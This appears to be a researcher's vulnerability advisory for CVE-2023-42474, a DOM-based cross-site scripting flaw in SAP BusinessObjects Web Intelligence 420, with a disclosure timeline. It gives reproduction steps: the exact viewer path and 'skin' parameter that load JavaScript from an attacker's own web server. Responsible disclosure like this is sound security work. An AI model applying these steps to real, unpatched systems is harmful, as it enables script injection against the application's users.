Research & Development
$ #

CVE-2023-42474

DOM-Based Cross-Site Scripting

6.8 (Medium)

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N

SAP Business Objects

SAP BusinessObjects Web Intelligence - version 420

Bartosz Śmigielski (glasn0st)

SAP BusinessObjects version 420 is vulnerable to DOM-XSS attack. An attacker can inject a URL into the GET parameter, injecting scripts from the given URL into the application. To exploit the vulnerability, access to the application is not required as the attack vector is a GET parameter. However, to find the bug, a low privilege account might be needed.

In order to reproduce the vulnerability, an attacker has to set up a HTTP server. For example, python http.server module. Webserver should serve a prototype.js file which contains malicious JavaScript code. For the sake of proving the concept, simple alert will go.
After running http server, go to URL:

https://(SAP Business Objects URL)/AnalyticalReporting/webiDHTML/viewer/language/en/html/printWindow.html?skin=[inject]

Replace (SAP Business Objects URL) with address of your application and [inject] with URL for your webserver.
After visiting the page, JavaScript code from the file served is executed.

  • 20-07-2023 - Vulnerability reported to vendor
  • 24-07-2023 - First response from SAP
  • 05-10-2023 - Vulnerability fixed during October patch day
  • 10-10-2023 - Acknowledge from SAP on their website
  • 30-05-2025 - PoC published